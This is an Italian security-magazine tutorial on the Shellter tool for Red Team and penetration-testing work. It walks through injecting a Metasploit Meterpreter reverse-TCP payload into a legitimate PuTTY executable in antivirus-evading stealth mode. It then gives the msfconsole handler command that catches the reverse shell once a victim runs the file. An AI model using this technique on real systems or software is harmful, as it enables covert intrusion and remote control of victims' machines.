OFFENSIVE TOOL

Shellter: così Red Team e penetration tester verificano la sicurezza dei sistemi informatici

In ambito offensive un tool come Shellter si rivela indispensabile per Red Team e penetration tester in quanto consente di testare e penetrare un sistema informatico al fine di verificarne il livello di protezione e l’efficienza dei software di sicurezza. Che c’è da sapere

Pubblicato il 14 Giu 2023

Vincenzo Digilio

Cyber Security Expert, Co-Founder CyberACK

Shellter tool per Red Team e penetration tester

Shellter è un tool che permette l’injection di uno shellcode all’interno di un “Portable Executable” (PE) file, allo scopo di eludere i software di sicurezza: rappresenta, dunque, uno strumento molto utile per Red Team e penetration tester in quanto consente di testare la sicurezza di un sistema informatico.

Cobalt Strike, il tool di sicurezza che piace tanto ai cyber criminali

Che cos’è un file PE

Il formato Portable Executable (PE) è una struttura dati che incapsula le informazioni necessarie per il loader di Windows, al fine di gestire il codice eseguibile. Ad esempio, un PE potrebbe essere il file di setup di un qualunque programma o degli eseguibili (notepad.exe, calc.exe, svchost.exe, spotifysetup.exe, puTTY.exe ecc.)

Il file PE contiene intestazioni che dettagliano il modo in cui il file dovrebbe essere caricato nella memoria, dove inizia il codice eseguibile, come gestire le importazioni e le esportazioni (ossia le funzioni e le variabili che il programma condivide con altre DLL o eseguibili), le risorse di cui il programma ha bisogno (come le icone e i menu), e molte altre informazioni utili per il loader del sistema operativo.

Il formato PE è quindi utilizzato per l’esecuzione di programmi in ambienti Windows. Inoltre, non è solo limitato ai file .exe, ma è utilizzato anche per i file .dll e altri tipi di file eseguibili su Windows.

Che cos’è uno Shellcode

Il termine Shellcode viene utilizzato per descrivere un insieme di istruzioni in linguaggio Assembly atte, solitamente, a eseguire una shell. La shell, in informatica, è il punto di dialogo fra l’utilizzatore e il sistema operativo.

Attraverso una shell è possibile impartire comandi, eseguire altri programmi, manipolare parametri e file di configurazione. La sua declinazione, solitamente, è il classico terminale testuale a riga di comando.

Uno Shellcode iniettato nel flusso di un normale programma, diventa un exploit. Alcuni tipi di ShellCode non richiedono la creazione di nuovi processi sulla macchina target e non hanno bisogno di ulteriore codice per la pulizia del processo vittima, in quanto possono ricorrere a librerie presenti all’interno del processo.

Potremmo scrivere noi stessi uno Shellcode o, più comunemente, farlo generare a un framework, tra cui uno dei più popolari è ad esempio Metasploit (se volete addentrarvi ulteriormente nella creazione di uno Shellcode vi rimando qui).

Il tool Shellter sfrutta la struttura originale del file PE, non applicando alcuna modifica (a meno che l’utente non lo desideri) e utilizza un approccio dinamico, adattandosi al flusso di esecuzione dell’applicazione.

In termini più semplici, potremmo dire che il tool permette di modificare un programma esistente per includere funzionalità aggiuntive o comportamenti nascosti.

Come funziona Shellter

A questo punto, dopo aver compreso cos’è il formato Portable Executable (PE) e come funziona uno Shellcode, possiamo iniziare a scoprire utilizzare il tool Shellter, che può essere scaricato da qui.

Il suo funzionamento può essere riassunto in quattro passaggi principali:

  1. Selezione del target: per prima cosa, va scelto un file eseguibile PE di destinazione. Questo potrebbe essere un qualsiasi file .exe su un sistema Windows, come un’applicazione software o il setup di un gioco.
  2. Analisi del file: Shellter analizza il file per determinare dove potrebbe essere iniettato lo Shellcode, senza danneggiare le funzionalità esistenti del file.
  3. Iniezione Shellcode: Shellter inietta lo Shellcode nel file di destinazione. Questo Shellcode potrebbe fare qualsiasi cosa, da aprire una backdoor sul sistema a scaricare ulteriori malware, a seconda di quello che è il suo scopo.
  4. Modifica dei punti di ingresso: infine, Shellter modifica i punti di ingresso del file di destinazione per assicurarsi che lo Shellcode venga eseguito all’apertura del file, facendo in modo che il file originale continui a eseguire il suo flusso normale di operazioni.

Utilizziamo Shellter in maniera responsabile

Premettiamo che non esiste un metodo univoco per bypassare tutti i software di protezione e gli antivirus in commercio (IDS/EDR/XDR/Antivirus/NextGen AV e via dicendo) e non è neanche questo lo scopo dell’articolo.

Ogni ambiente da testare/penetrare/hackerare dovrebbe essere prima testato e riprodotto in laboratorio, in modo da essere sicuri di raggiungere il risultato previsto.

Installazione del tool

La distro che utilizzeremo nell’esempio è la popolare Kali.

Possiamo installare Shellter in Kali utilizzando il comando apt:

apt-cache search shellter

sudo apt install shellter

Immagine che contiene testo, Carattere, schermataDescrizione generata automaticamente

Dato che Shellter è progettato per essere eseguito sui sistemi Windows, è opportuno installare anche wine.

Cos’è wine

Wine, acronimo che sta per “Wine Is Not an Emulator”, è un software open source che permette di eseguire applicazioni sviluppate per Microsoft Windows su sistemi operativi Unix-like, come Linux, macOS, & BSD.

Contrariamente a quello che suggerisce il suo nome, agisce come una sorta “layer di compatibilità”, traducendo le chiamate di sistema Windows in chiamate di sistema Linux/Unix istantaneamente. Questo permette alle applicazioni di funzionare come se fossero native del sistema operativo host.

Per installarlo sulla nostra distribuzione Kali, ci basterà eseguire i comandi:

sudo apt install wine

Per la compatibilità win32, lanciamo in successione (con i permessi sudo) i seguenti comandi:

dpkg –add-architecture i386

apt-get update

apt-get install wine32

Per lanciare il tool non dovremo far altro che digitare shellter sul nostro terminale. Il tool si avvierà dietro la console di wine.

Immagine che contiene testo, schermo, schermata, multimedialeDescrizione generata automaticamente

Per prima cosa, dovremo scegliere se lanciare il tool in modalità manuale o automatica:

  1. Modalità automatica: in questa modalità, Shellter prende un file eseguibile legittimo ed inserisce automaticamente all’interno il codice payload, utilizzando tecniche per nasconderlo dai software antivirus. La modalità automatica è più semplice e richiede meno interazione da parte dell’utente. Tutti i passaggi del processo di iniezione vengono eseguiti in maniera automatizzata dal tool stesso.
  2. Modalità manuale: questa modalità offre un controllo molto più granulare sul processo di iniezione del payload. Permette all’utente di scegliere specifici punti di iniezione all’interno del file eseguibile e di personalizzare il comportamento del codice maligno. Sebbene la modalità manuale richieda una maggiore conoscenza tecnica e più tempo per essere eseguita rispetto alla modalità automatica, può portare a risultati maggiormente efficaci, poiché consente di creare payload unici e meno rilevabili.

Per il nostro scopo utilizzeremo la modalità automatica, digitando sul terminale A.

Il prossimo step prevede l’inserimento del nostro PE target. Ammettiamo di voler manipolare un file eseguibile, che abbiamo visto essere ampiamente utilizzato dalla nostra organizzazione target: PuTTY.

PuTTY è un client ed emulatore di terminale gratuito e open-source, sviluppato originariamente da Simon Tatham per il sistema operativo Windows. È ampiamente utilizzato dai sistemisti e dai programmatori come emulatore di terminale e come client per vari protocolli di rete, tra cui SCP, SSH, Telnet e rlogin.

NOTA: Prima di utilizzare un eseguibile legittimo, sarebbe utile scansionarlo utilizzando uno scanner multi-AV online; a volte, infatti, gli AV producono falsi positivi e sarebbe quindi importante accertarsi che l’eseguibile scelto non ne produca.

Scarichiamo quindi PuTTY da qui (la versione a 32bit), posizionandolo sul nostro Desktop.

Inseriamo il percorso del nostro eseguibile nel tool e diamo Invio.

Immagine che contiene testo, schermata, orologio, Orologio digitaleDescrizione generata automaticamente

La prima cosa che Shellter farà sarà eseguire un backup del file originale.

Appena identificato un possibile punto di aggancio dello Shellcode, ci verrà chiesto se vogliamo abilitare la modalità Stealth.

La modalità Stealth in Shellter è una funzionalità avanzata che migliora la capacità di evitare il rilevamento del payload da parte dei software antivirus. Il metodo di iniezione del codice utilizzato da questa modalità rende la rilevazione molto più complessa rispetto alla modalità standard. La funzionalità Stealth fa sì che il payload venga eseguito solo quando vengono soddisfatte determinate condizioni, definite durante il processo di iniezione, e preserva il normale funzionamento dell’applicazione.

Se l’obiettivo è esclusivamente l’esecuzione del payload mediante l’applicazione lecita che lo veicola, non è necessario utilizzare la funzione Stealth. Se, diversamente, l’operazione è atta alla simulazione di un attacco APT da parte di un RedTeam, vi consiglio di utilizzarla al fine di preservare le funzionalità originali dell’applicazione infetta.

Digitiamo Y e continuiamo. Ci vengono presentati, a questo punto, una lista di payloads.

Immagine che contiene testo, schermata, Carattere, designDescrizione generata automaticamente

Nel nostro esempio, utilizzeremo la versione del payload classica di Metasploit con il Meterpreter. Quindi: digitiamo L, diamo Invio e successivamente scegliamo l’opzione 1, confermando la nostra scelta.

I prossimi due parametri che setteremo sono molto comuni e utilizzati nelle attività di penetration testing, in particolare quando si sta creando un payload con un tool come Metasploit. Questi parametri vengono utilizzati per definire le impostazioni di connessione per una Reverse Shell o un altro tipo di backdoor:

  1. LHOST (Local HOST): questo parametro viene utilizzato per specificare l’indirizzo IP della macchina del Penetration Tester (o più genericamente, l’indirizzo IP del sistema che sta ricevendo la connessione). In altre parole, LHOST è l’indirizzo IP a cui la shell inversa o il payload dovrebbe connettersi dopo essere stato eseguito sul sistema di destinazione.
  2. LPORT (Local PORT): questo parametro viene utilizzato per specificare la porta, sulla macchina del Penetration Tester, che sarà utilizzata per ascoltare le connessioni in entrata dal payload o dalla Reverse Shell. In sostanza, LPORT è la porta su cui il sistema che riceve la connessione sta ascoltando.

Immagine che contiene testo, schermata, Carattere, softwareDescrizione generata automaticamente

Una volta terminata la fase di verifica con successo, la nostra injection sarà terminata.

Immagine che contiene testo, schermata, CarattereDescrizione generata automaticamente

Il nostro ultimo passo sarà metterci in ascolto per ricevere la Reverse Shell, una volta che la vittima ignara avrà cliccato sull’eseguibile di PuTTY, che assolverà al suo compito originale diventando il nostro cavallo di Troia per veicolare il malware:

msfconsole -x “use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST 192.168.178.73;set LPORT 443;run;”

dove:

  1. msfconsole: avvia l’interfaccia della console di Metasploit;
  2. -x: esegue un comando o una serie di comandi specifici subito dopo l’avvio di Metasploit;
  3. use exploit/multi/handler: specifica il modulo da utilizzare, in questo caso “exploit/multi/handler”;
  4. set payload windows/meterpreter/reverse_tcp: imposta il payload che il listener si aspetta di ricevere. In questo caso, il payload è una Shell Meterpreter che utilizza una ReverseShell (TCP) su un sistema Windows;
  5. set LHOST 192.168.178.73: imposta l’indirizzo IP dell’host locale (LHOST) a “192.168.178.73”;
  6. set LPORT 443: imposta la porta dell’host locale (LPORT) alla porta 443;
  7. run: avvia il listener.

Valuta la qualità di questo articolo

La tua opinione è importante per noi!

Speciale PNRR

Tutti
Incentivi
Salute digitale
Formazione
Analisi
Sostenibilità
PA
Sostemibilità
Sicurezza
Digital Economy
CODICE STARTUP
Imprenditoria femminile: come attingere ai fondi per le donne che fanno impresa
DECRETI
PNRR e Fascicolo Sanitario Elettronico: investimenti per oltre 600 milioni
IL DOCUMENTO
Competenze digitali, ecco il nuovo piano operativo nazionale
STRUMENTI
Da Istat e RGS gli indicatori per misurare la sostenibilità nel PNRR
STRATEGIE
PNRR – Piano nazionale di Ripresa e Resilienza: cos’è e novità
FONDI
Pnrr, ok della Ue alla seconda rata da 21 miliardi: focus su 5G e banda ultralarga
GREEN ENERGY
Energia pulita: Banca Sella finanzia i progetti green incentivati dal PNRR
TECNOLOGIA SOLIDALE
Due buone notizie digitali: 500 milioni per gli ITS e l’inizio dell’intranet veloce in scuole e ospedali
INNOVAZIONE
Competenze digitali e InPA cruciali per raggiungere gli obiettivi del Pnrr
STRATEGIE
PA digitale 2026, come gestire i fondi PNRR in 5 fasi: ecco la proposta
ANALISI
Value-based healthcare: le esperienze in Italia e il ruolo del PNRR
Strategie
Accordi per l’innovazione, per le imprese altri 250 milioni
Strategie
PNRR, opportunità e sfide per le smart city
Strategie
Brevetti, il Mise mette sul piatto 8,5 milioni
Strategie
PNRR e opere pubbliche, la grande sfida per i Comuni e perché bisogna pensare digitale
Formazione
Trasferimento tecnologico, il Mise mette sul piatto 7,5 milioni
Strategie
PSN e Strategia Cloud Italia: a che punto siamo e come supportare la PA in questo percorso
Dispersione idrica
Siccità: AI e analisi dei dati possono ridurre gli sprechi d’acqua. Ecco gli interventi necessari
PNRR
Cloud, firmato il contratto per l’avvio di lavori del Polo strategico
Formazione
Competenze digitali, stanziati 48 milioni per gli Istituti tecnologici superiori
Iniziative
Digitalizzazione delle reti idriche: oltre 600 milioni per 21 progetti
Competenze e competitività
PNRR, così i fondi UE possono rilanciare la ricerca e l’Università
Finanziamenti
PNRR, si sbloccano i fondi per l’agrisolare
Sanità post-pandemica
PNRR, Missione Salute: a che punto siamo e cosa resta da fare
Strategie
Sovranità e autonomia tecnologica nazionale: come avviare un processo virtuoso e sostenibile
La relazione
Pnrr e PA digitale, l’alert della Corte dei conti su execution e capacità di spesa
L'editoriale
Elezioni 2022, la sfida digitale ai margini del dibattito politico
Strategie
Digitale, il monito di I-Com: “Senza riforme Pnrr inefficace”
Transizione digitale
Pnrr: arrivano 321 milioni per cloud dei Comuni, spazio e mobilità innovativa
L'analisi I-COM
Il PNRR alla prova delle elezioni: come usare bene le risorse e centrare gli obiettivi digitali
Cineca
Quantum computing, una svolta per la ricerca: lo scenario europeo e i progetti in corso
L'indice europeo
Desi, l’Italia scala due posizioni grazie a fibra e 5G. Ma è (ancora) allarme competenze
L'approfondimento
PNRR 2, ecco tutte le misure per cittadini e imprese: portale sommerso, codice crisi d’impresa e sismabonus, cosa cambia
Servizi digitali
PNRR e trasformazione digitale: ecco gli investimenti e le riforme previste per la digitalizzazione della PA
Legal health
Lo spazio europeo dei dati sanitari: come circoleranno le informazioni sulla salute nell’Unione Europea
Servizi digitali
PNRR e PA digitale: non dimentichiamo la dematerializzazione
Digital Healthcare transformation
La trasformazione digitale degli ospedali
Governance digitale
PA digitale, è la volta buona? Così misure e risorse del PNRR possono fare la differenza
Servizi digitali
Comuni e digitale, come usare il PNRR senza sbagliare
La survey
Pnrr e digitale accoppiata vincente per il 70% delle pmi italiane
Missione salute
Fascicolo Sanitario Elettronico alla prova del PNRR: limiti, rischi e opportunità
Servizi pubblici
PNRR: come diventeranno i siti dei comuni italiani grazie alle nuove risorse
Skill gap
PNRR, la banda ultra larga crea 20.000 nuovi posti di lavoro
Il Piano
Spazio, Colao fa il punto sul Pnrr: i progetti verso la milestone 2023
FORUMPA2022
PNRR e trasformazione digitale: rivedi i Talk di FORUM PA 2022 in collaborazione con le aziende partner
I contratti
Avio, 340 milioni dal Pnrr per i nuovi propulsori a metano
Next Generation EU
PNRR, a che punto siamo e cosa possono aspettarsi le aziende private
Fondi
Operativo il nuovo portale del MISE con tutti i finanziamenti per le imprese
Servizi comunali
Il PNRR occasione unica per i Comuni digitali: strumenti e risorse per enti e cittadini
Healthcare data platform
PNRR dalla teoria alla pratica: tecnologie e soluzioni per l’innovazione in Sanità
Skill
Competenze digitali, partono le Reti di facilitazione
Gli obiettivi
Scuola 4.0, PNRR ultima chance: ecco come cambierà il sistema formativo
Sistema Paese
PNRR 2, è il turno della space economy
FORUM PA 2022
FORUM PA 2022: la maturità digitale dei comuni italiani rispetto al PNRR
Analisi
PNRR: dalla Ricerca all’impresa, una sfida da cogliere insieme
Innovazione
Pnrr, il Dipartimento per la Trasformazione digitale si riorganizza
FORUM PA 2022
PA verde e sostenibile: il ruolo di PNRR, PNIEC, energy management e green public procurement
Analisi
PNRR, Comuni e digitalizzazione: tutto su fondi e opportunità, in meno di 3 minuti. Guarda il video!
Rapporti
Competenze digitali e servizi automatizzati pilastri del piano Inps
Analisi
Attuazione del PNRR: il dialogo necessario tra istituzioni e società civile. Rivedi lo Scenario di FORUM PA 2022
Progetti
Pnrr, fondi per il Politecnico di Torino. Fra i progetti anche IS4Aerospace
Analisi
PNRR, Colao fa il punto sulla transizione digitale dell’Italia: «In linea con tutte le scadenze»
La Svolta
Ict, Istat “riclassifica” i professionisti. Via anche al catalogo dati sul Pnrr
Analisi
Spazio, Colao fa il punto sul Pnrr: i progetti verso la milestone 2023
FORUM PA 2022
Ecosistema territoriale sostenibile: l’Emilia Romagna tra FESR e PNRR
Il Piano
Innovazione, il Mise “centra” gli obiettivi Pnrr: attivati 17,5 miliardi
Analisi
PNRR: raggiunti gli obiettivi per il primo semestre 2022. Il punto e qualche riflessione
Analisi
PNRR: dal dialogo tra PA e società civile passa il corretto monitoraggio dei risultati, tra collaborazione e identità dei luoghi
Webinar
Comuni e PNRR: un focus sui bandi attivi o in pubblicazione
Analisi
Formazione 4.0: cos’è e come funziona il credito d’imposta
PA e Sicurezza
PA e sicurezza informatica: il ruolo dei territori di fronte alle sfide della digitalizzazione
PA e sicurezza
PNRR e servizi pubblici digitali: sfide e opportunità per Comuni e Città metropolitane
Water management
Water management in Italia: verso una transizione “smart” e “circular” 
LE RISORSE
Transizione digitale, Simest apre i fondi Pnrr alle medie imprese
Prospettive
Turismo, cultura e digital: come spendere bene le risorse del PNRR
Analisi
Smart City: quale contributo alla transizione ecologica
Decarbonizzazione
Idrogeno verde, 450 milioni € di investimenti PNRR, Cingolani firma
Unioncamere
PNRR, imprese in ritardo: ecco come le Camere di commercio possono aiutare
I fondi
Industria 4.0: solo un’impresa su tre pronta a salire sul treno Pnrr
CODICE STARTUP
Imprenditoria femminile: come attingere ai fondi per le donne che fanno impresa
DECRETI
PNRR e Fascicolo Sanitario Elettronico: investimenti per oltre 600 milioni
IL DOCUMENTO
Competenze digitali, ecco il nuovo piano operativo nazionale
STRUMENTI
Da Istat e RGS gli indicatori per misurare la sostenibilità nel PNRR
STRATEGIE
PNRR – Piano nazionale di Ripresa e Resilienza: cos’è e novità
FONDI
Pnrr, ok della Ue alla seconda rata da 21 miliardi: focus su 5G e banda ultralarga
GREEN ENERGY
Energia pulita: Banca Sella finanzia i progetti green incentivati dal PNRR
TECNOLOGIA SOLIDALE
Due buone notizie digitali: 500 milioni per gli ITS e l’inizio dell’intranet veloce in scuole e ospedali
INNOVAZIONE
Competenze digitali e InPA cruciali per raggiungere gli obiettivi del Pnrr
STRATEGIE
PA digitale 2026, come gestire i fondi PNRR in 5 fasi: ecco la proposta
ANALISI
Value-based healthcare: le esperienze in Italia e il ruolo del PNRR
Strategie
Accordi per l’innovazione, per le imprese altri 250 milioni
Strategie
PNRR, opportunità e sfide per le smart city
Strategie
Brevetti, il Mise mette sul piatto 8,5 milioni
Strategie
PNRR e opere pubbliche, la grande sfida per i Comuni e perché bisogna pensare digitale
Formazione
Trasferimento tecnologico, il Mise mette sul piatto 7,5 milioni
Strategie
PSN e Strategia Cloud Italia: a che punto siamo e come supportare la PA in questo percorso
Dispersione idrica
Siccità: AI e analisi dei dati possono ridurre gli sprechi d’acqua. Ecco gli interventi necessari
PNRR
Cloud, firmato il contratto per l’avvio di lavori del Polo strategico
Formazione
Competenze digitali, stanziati 48 milioni per gli Istituti tecnologici superiori
Iniziative
Digitalizzazione delle reti idriche: oltre 600 milioni per 21 progetti
Competenze e competitività
PNRR, così i fondi UE possono rilanciare la ricerca e l’Università
Finanziamenti
PNRR, si sbloccano i fondi per l’agrisolare
Sanità post-pandemica
PNRR, Missione Salute: a che punto siamo e cosa resta da fare
Strategie
Sovranità e autonomia tecnologica nazionale: come avviare un processo virtuoso e sostenibile
La relazione
Pnrr e PA digitale, l’alert della Corte dei conti su execution e capacità di spesa
L'editoriale
Elezioni 2022, la sfida digitale ai margini del dibattito politico
Strategie
Digitale, il monito di I-Com: “Senza riforme Pnrr inefficace”
Transizione digitale
Pnrr: arrivano 321 milioni per cloud dei Comuni, spazio e mobilità innovativa
L'analisi I-COM
Il PNRR alla prova delle elezioni: come usare bene le risorse e centrare gli obiettivi digitali
Cineca
Quantum computing, una svolta per la ricerca: lo scenario europeo e i progetti in corso
L'indice europeo
Desi, l’Italia scala due posizioni grazie a fibra e 5G. Ma è (ancora) allarme competenze
L'approfondimento
PNRR 2, ecco tutte le misure per cittadini e imprese: portale sommerso, codice crisi d’impresa e sismabonus, cosa cambia
Servizi digitali
PNRR e trasformazione digitale: ecco gli investimenti e le riforme previste per la digitalizzazione della PA
Legal health
Lo spazio europeo dei dati sanitari: come circoleranno le informazioni sulla salute nell’Unione Europea
Servizi digitali
PNRR e PA digitale: non dimentichiamo la dematerializzazione
Digital Healthcare transformation
La trasformazione digitale degli ospedali
Governance digitale
PA digitale, è la volta buona? Così misure e risorse del PNRR possono fare la differenza
Servizi digitali
Comuni e digitale, come usare il PNRR senza sbagliare
La survey
Pnrr e digitale accoppiata vincente per il 70% delle pmi italiane
Missione salute
Fascicolo Sanitario Elettronico alla prova del PNRR: limiti, rischi e opportunità
Servizi pubblici
PNRR: come diventeranno i siti dei comuni italiani grazie alle nuove risorse
Skill gap
PNRR, la banda ultra larga crea 20.000 nuovi posti di lavoro
Il Piano
Spazio, Colao fa il punto sul Pnrr: i progetti verso la milestone 2023
FORUMPA2022
PNRR e trasformazione digitale: rivedi i Talk di FORUM PA 2022 in collaborazione con le aziende partner
I contratti
Avio, 340 milioni dal Pnrr per i nuovi propulsori a metano
Next Generation EU
PNRR, a che punto siamo e cosa possono aspettarsi le aziende private
Fondi
Operativo il nuovo portale del MISE con tutti i finanziamenti per le imprese
Servizi comunali
Il PNRR occasione unica per i Comuni digitali: strumenti e risorse per enti e cittadini
Healthcare data platform
PNRR dalla teoria alla pratica: tecnologie e soluzioni per l’innovazione in Sanità
Skill
Competenze digitali, partono le Reti di facilitazione
Gli obiettivi
Scuola 4.0, PNRR ultima chance: ecco come cambierà il sistema formativo
Sistema Paese
PNRR 2, è il turno della space economy
FORUM PA 2022
FORUM PA 2022: la maturità digitale dei comuni italiani rispetto al PNRR
Analisi
PNRR: dalla Ricerca all’impresa, una sfida da cogliere insieme
Innovazione
Pnrr, il Dipartimento per la Trasformazione digitale si riorganizza
FORUM PA 2022
PA verde e sostenibile: il ruolo di PNRR, PNIEC, energy management e green public procurement
Analisi
PNRR, Comuni e digitalizzazione: tutto su fondi e opportunità, in meno di 3 minuti. Guarda il video!
Rapporti
Competenze digitali e servizi automatizzati pilastri del piano Inps
Analisi
Attuazione del PNRR: il dialogo necessario tra istituzioni e società civile. Rivedi lo Scenario di FORUM PA 2022
Progetti
Pnrr, fondi per il Politecnico di Torino. Fra i progetti anche IS4Aerospace
Analisi
PNRR, Colao fa il punto sulla transizione digitale dell’Italia: «In linea con tutte le scadenze»
La Svolta
Ict, Istat “riclassifica” i professionisti. Via anche al catalogo dati sul Pnrr
Analisi
Spazio, Colao fa il punto sul Pnrr: i progetti verso la milestone 2023
FORUM PA 2022
Ecosistema territoriale sostenibile: l’Emilia Romagna tra FESR e PNRR
Il Piano
Innovazione, il Mise “centra” gli obiettivi Pnrr: attivati 17,5 miliardi
Analisi
PNRR: raggiunti gli obiettivi per il primo semestre 2022. Il punto e qualche riflessione
Analisi
PNRR: dal dialogo tra PA e società civile passa il corretto monitoraggio dei risultati, tra collaborazione e identità dei luoghi
Webinar
Comuni e PNRR: un focus sui bandi attivi o in pubblicazione
Analisi
Formazione 4.0: cos’è e come funziona il credito d’imposta
PA e Sicurezza
PA e sicurezza informatica: il ruolo dei territori di fronte alle sfide della digitalizzazione
PA e sicurezza
PNRR e servizi pubblici digitali: sfide e opportunità per Comuni e Città metropolitane
Water management
Water management in Italia: verso una transizione “smart” e “circular” 
LE RISORSE
Transizione digitale, Simest apre i fondi Pnrr alle medie imprese
Prospettive
Turismo, cultura e digital: come spendere bene le risorse del PNRR
Analisi
Smart City: quale contributo alla transizione ecologica
Decarbonizzazione
Idrogeno verde, 450 milioni € di investimenti PNRR, Cingolani firma
Unioncamere
PNRR, imprese in ritardo: ecco come le Camere di commercio possono aiutare
I fondi
Industria 4.0: solo un’impresa su tre pronta a salire sul treno Pnrr

Articoli correlati

Articolo 1 di 3